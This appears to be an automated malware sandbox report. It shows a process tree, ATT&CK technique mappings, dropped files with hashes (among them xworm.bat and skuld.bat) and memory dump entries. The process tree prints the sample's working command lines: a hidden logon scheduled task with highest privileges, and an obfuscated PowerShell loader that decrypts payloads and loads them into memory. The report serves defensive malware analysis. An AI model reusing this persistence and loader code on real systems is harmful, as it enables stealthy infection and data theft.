        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_172_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_172.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4656
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_172.vbs"
        6⤵
        
        PID:2080
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_172.bat" "
        7⤵
        
        PID:1652
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OizxnO3/pdWJ2fJPn6JfWHEAeJ8e9YmWGBkF1RD8gB4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('M1hDsCU064fe3nz1n2J+tA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BuVAi=New-Object System.IO.MemoryStream(,$param_var); $nTyYw=New-Object System.IO.MemoryStream; $UaJSA=New-Object System.IO.Compression.GZipStream($BuVAi, [IO.Compression.CompressionMode]::Decompress); $UaJSA.CopyTo($nTyYw); $UaJSA.Dispose(); $BuVAi.Dispose(); $nTyYw.Dispose(); $nTyYw.ToArray();}function execute_function($param_var,$param2_var){ $UcolZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iAUtD=$UcolZ.EntryPoint; $iAUtD.Invoke($null, $param2_var);}$QWHqr = 'C:\Users\Admin\AppData\Roaming\Windows_Log_172.bat';$host.UI.RawUI.WindowTitle = $QWHqr;$RtxIM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QWHqr).Split([Environment]::NewLine);foreach ($igBOM in $RtxIM) { if ($igBOM.StartsWith('RgLhaxlcPBQqpmRoVUam')) { $EeOca=$igBOM.Substring(20); break; }}$payloads_var=[string[]]$EeOca.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        8⤵
        
        PID:3240
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        
        PID:3148

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5012

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2832 -ip 2832
1⤵
PID:1780

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
8ba8fc1034d449222856ea8fa2531e28

SHA1
7570fe1788e57484c5138b6cead052fbc3366f3e

SHA256
2e72609b2c93e0660390a91c8e5334d62c7b17cd40f9ae8afcc767d345cc12f2

SHA512
7ee42c690e5db3818e445fa8f50f5db39973f8caf5fce0b4d6261cb5a637e63f966c5f1734ee743b9bf30bcf8d18aa70ceb65ed41035c2940d4c6d34735e0d7b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
0c705388d79c00418e5c1751159353e3

SHA1
aaeafebce5483626ef82813d286511c1f353f861

SHA256
697bd270be634688c48210bee7c5111d7897fd71a6af0bbb2141cefd2f8e4a4d

SHA512
c1614e79650ab9822c4e175ba528ea4efadc7a6313204e4e69b4a9bd06327fb92f56fba95f2595885b1604ca8d8f6b282ab542988995c674d89901da2bc4186f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
0d84d1490aa9f725b68407eab8f0030e

SHA1
83964574467b7422e160af34ef024d1821d6d1c3

SHA256
40c09bb0248add089873d1117aadefb46c1b4e23241ba4621f707312de9c829e

SHA512
f84552335ff96b5b4841ec26e222c24af79b6d0271d27ad05a9dfcee254a7b9e9019e7fac0def1245a74754fae81f7126499bf1001615073284052aaa949fa00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
83e506b90ab01134a49d1c39f81435a4

SHA1
313ab67404fef224ba69c3690819f6ec838cfdb7

SHA256
e934697cff1c479a14fefb6b7d30c45767c57b76f59e8c82fd20dfb176062a75

SHA512
bd7b09b8d7463ab1b44d6e7315ada34a5794a54709ad8912f1e840b2023f54e95a13c21bec73662d5eaf9273a5c8ab9abe98a5e8a291e37b420eef6d3deb2e0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
3abf936b2a2f2edd91e713b4a5d33b97

SHA1
bfadcecc9566777179ea62a934b216abd4e66b30

SHA256
ee183117529cc34604c75321e615018e52515f8ec77a8e67aa7d5a79e82d70de

SHA512
72d8437e336c7d2cb116deb59bebef5d12a92f40dd4bf40b21b8cb62902e372d92e24d3fdee065a6a56566c77ccc9e467374691474ba2f7a6a7cea2774e022ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
8KB

MD5
f83f1a3f4a7906ed93685e99de3e48e5

SHA1
35ed7e2a0070b7e6d0e3bef6b9f438e3766af9ff

SHA256
8e0016cbbe024c2a41e839ccf172cf494ba734f49c726557a219f7d7a269c412

SHA512
74459300b7754b229bff4112216ee76a00853cbc4720ec3eb2806f6ccac58820edfda56949536296707ad0eb7a52cb22cf3b5d8fd07eefedd3a4787830e6a354

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
8KB

MD5
a8d9fa260268d0aeef5c604ce35c9c5a

SHA1
2c6e5216c65c9364a36e21b5b7fc8db5ff18fa5c

SHA256
138d72817b6d39a6252ff82a6372f38c601cd48fa2b1cbafdfb41fbecc450275

SHA512
185ce2947efa77a78ce0ed9523ec7cc6e86f121c96e5e857a4d7cc9c1caa5f99ceb6a7ba338e76c1e749077aadc0cd93d760b6365693abcffa09fe2f5853417e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
1314d6b12ac057e167c1734363b8d32d

SHA1
f54e69b17fb65b8da661c6404eb48ec217639270

SHA256
6fdc5fca629f98db66a207b28ccd11df1d8698539e273082550b7f9eab5e3347

SHA512
0b87e2ad7adc9bc31cf58b4f705f329250185799d99a2ba0d5a83f623dd5f00eb51e38518a9d6ae16868aadc334c69c7d34eacc4a488dfc6303372f5331458ca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
2a1fdb89cf408566ad184e42e71bb123

SHA1
2f834624e56b5082a6a25a88e3d915cbfbc3755c

SHA256
a7f4944b7fa7efb91706f53d6694c619e5f165402b59630c4471513c8e1d515d

SHA512
0cfd3a5f047f855186fb03cab9f1ae7595225a1568061a03f14880e5093b82dda05729af4289b6572c833a192bf512fcf6d3901f066666ea3fda248d379ca0de

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
21KB

MD5
a5c46224f3aa8c927796932b28d119b4

SHA1
07988cd548792010638e409431cfd55fbd16ce72

SHA256
2e9554fcb56fa5bbf482a3974ff32a7c7d55ea0bb619bcb1a132d5cacc5f88e8

SHA512
8a51e69ebfba35973671060be512dc0f4018d871626168379d191366a4ccc878514209914fa343d0fe92052a78b53ee9333d948c647eaee3ef4e2e5d75c62b63

Download Submit
C:\Users\Admin\AppData\Local\Temp\Log.tmp

Filesize
62B

MD5
48a4d8d2f59528ab75380faa39981ca7

SHA1
aaba2693e7c957bcdf02b95c96348f57dfde0da6

SHA256
7dc95e5d061697cc48611533328a01f7a69981ff6bd4c86581c98df867a558a2

SHA512
ae8e0f246aab54ebad63bde7dd3594673f92ecd560d047e68a01a731fcb4efbc5625ea36b6b4f0ed90647cae9ed4c8744df0fdf6c4a2c28a467382f29a71616e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cracker.bat

Filesize
422B

MD5
28194258aa09be52f6767e389194ef1d

SHA1
d7ede25b3ebd83a084cff22ae1ad4f7612a99eb0

SHA256
f02fe5951dc207722da607c087c4222067df5ca126687541f3736130e166efbc

SHA512
eec2fc47c9fa340c17a3ff5fb5ffe0abe3ffe1966da131435ca9bcd9b100f2cacf60039969ee4f8e8ea0340d74b8772f9205e57b9a2c83bfdd2ea49c7e5b741c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.bat

Filesize
12.8MB

MD5
189e42d1a681c3b07c7f92d247c214b0

SHA1
8b96bb15ccb0d433b07b5eadeb5e2a05157d5d99

SHA256
ba7e850b945f72b85cd39d8fc5f6571962ccdfbba5fbda12fc2794b241dce9fd

SHA512
d2acb262d4c1b5fcd63950b3c6928701d6a3314d63e63a243e2df8908b746d7649bf8d3b2b6dd0dc6f39c483bead6516260a7d1e201685eef112134833a95e24

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\website.bat

Filesize
74B

MD5
b3be17a14609d812602af67da8b7acc2

SHA1
e1fcc3e3989ee6846694eba252622a336ce63795

SHA256
f6cb1a4b508b1650cc1eaa607f545e50967157eef4f676de39836f2806d63b81

SHA512
780a624a79bb3b293d83017595f709dd9fdc9e645f9c8bc5102aacaaad89a622e6a0dae9ea30fc3679378f6fe4afe34937f4909594c32351ee831917e8b0c1a7

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\wompwomp.bat

Filesize
340B

MD5
6943c2eb7e78b8b8cb8171b940de20f2

SHA1
e428c6dc0ffc17ab70178765e0bcb23dc0c12b8a

SHA256
eb79d4bf846dfbd540085f0972658373f26709f281dfb88ad461f9df03d83095

SHA512
1d628f3c5ac6e41ed14cc0069bde0278248e32c77e2e111bc842a71ba62d52913b47fb29402ce79b3d0880b6b5763b0d9906d6fb65bcfdf33103aefa0044552b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\xworm.bat

Filesize
155KB

MD5
45f7e10fb33d48463a55c89d40d4824a

SHA1
b95ef1efdb8f79c468cd4cdcd85c8dd54087d9e2

SHA256
7f37dbc61973ca542c89303b1df4f33ccc5ac442a16f497b115236bb58664d2f

SHA512
43ad9acb9e43063a2d83045a24ff24ea7e211c05cdfc2b202f5cf1bd4e73ee9a134802c9aec22e7b941d4eec905055426b313ea30c7a55a6bb2ca467e77325ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nej3pzew.lc0.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Windows_Log_172.vbs

Filesize
115B

MD5
b2f9e9363d5230b504c727b66c8f899a

SHA1
ca002f96780145e6bdf6efea6d08a4f3997f4769

SHA256
658a5212102e7582c463120ff34a0873c21dbae015a2e048e36ecdbf9fb4137b

SHA512
04a8c7cc5d73ca21e96de1f88a02a6a4a5a71d74b0b5a47ad376bf0b3dea27ced75036819d0fea8994331fe95150eaff9c6c1fbb8199e8d336b6b378983d4c28

Download Submit
C:\Users\Admin\AppData\Roaming\Windows_Log_822.vbs

Filesize
115B

MD5
d58fbbe00f10ac2f1c10caeadc86cd35

SHA1
a4c82ac805ab54686f8f14a1f7b28eb6c2675b9f

SHA256
31ba666c8effdfb73401edb4edec3ffad73f847dfab9b2ea32b1476127ffb6f9

SHA512
06ba02dd9bc8bd8cbd09ae073257fd081f6e5b3e30524b73c868a10e78ac50dec70d0ee75c5d0fae7843ec12ebe6aad14a5fb001e0c1c6463da26ec53d325ce9

Download Submit
memory/1792-151-0x0000000007380000-0x0000000007391000-memory.dmp

Filesize
68KB

Download
memory/1792-139-0x0000000072620000-0x000000007266C000-memory.dmp

Filesize
304KB

Download
memory/1792-148-0x0000000007050000-0x00000000070F4000-memory.dmp

Filesize
656KB

Download
memory/1956-39-0x0000000002780000-0x00000000027B6000-memory.dmp

Filesize
216KB

Download
memory/1956-63-0x0000000005F10000-0x0000000005F56000-memory.dmp

Filesize
280KB

Download
memory/1956-62-0x0000000005FF0000-0x000000000603C000-memory.dmp

Filesize
304KB

Download
memory/1956-61-0x0000000005B30000-0x0000000005B4E000-memory.dmp

Filesize
120KB

Download
memory/1956-52-0x0000000005750000-0x0000000005AA7000-memory.dmp

Filesize
3.3MB

Download
memory/1956-124-0x0000000004A70000-0x0000000004A78000-memory.dmp

Filesize
32KB

Download
memory/1956-40-0x0000000005120000-0x000000000574A000-memory.dmp

Filesize
6.2MB

Download
memory/1956-126-0x0000000031C80000-0x0000000032620000-memory.dmp

Filesize
9.6MB

Download
memory/3148-185-0x0000000007FC0000-0x0000000008052000-memory.dmp

Filesize
584KB

Download
memory/3148-186-0x0000000008090000-0x000000000809A000-memory.dmp

Filesize
40KB

Download
memory/3148-137-0x0000000007D90000-0x0000000007DA0000-memory.dmp

Filesize
64KB

Download
memory/3148-138-0x0000000007E40000-0x0000000007EDC000-memory.dmp

Filesize
624KB

Download
memory/4128-41-0x0000000005AA0000-0x0000000005AC2000-memory.dmp

Filesize
136KB

Download
memory/4128-68-0x00000000088D0000-0x0000000008E76000-memory.dmp

Filesize
5.6MB

Download
memory/4128-42-0x0000000005C40000-0x0000000005CA6000-memory.dmp

Filesize
408KB

Download
memory/4128-43-0x0000000005CB0000-0x0000000005D16000-memory.dmp

Filesize
408KB

Download
memory/4128-65-0x0000000007BF0000-0x0000000007C0A000-memory.dmp

Filesize
104KB

Download
memory/4128-64-0x0000000008250000-0x00000000088CA000-memory.dmp

Filesize
6.5MB

Download
memory/4128-66-0x0000000007C20000-0x0000000007C28000-memory.dmp

Filesize
32KB

Download
memory/4128-67-0x0000000007C50000-0x0000000007C70000-memory.dmp

Filesize
128KB

Download
memory/4656-89-0x0000000007AE0000-0x0000000007B84000-memory.dmp

Filesize
656KB

Download
memory/4656-79-0x0000000072620000-0x000000007266C000-memory.dmp

Filesize
304KB

Download
memory/4656-78-0x0000000006EA0000-0x0000000006ED4000-memory.dmp

Filesize
208KB

Download
memory/4656-88-0x0000000007AC0000-0x0000000007ADE000-memory.dmp

Filesize
120KB

Download
memory/4656-92-0x0000000007E30000-0x0000000007E41000-memory.dmp

Filesize
68KB

Download
memory/4656-90-0x0000000007C90000-0x0000000007C9A000-memory.dmp

Filesize
40KB

Download
memory/4656-91-0x0000000007EA0000-0x0000000007F36000-memory.dmp

Filesize
600KB

Download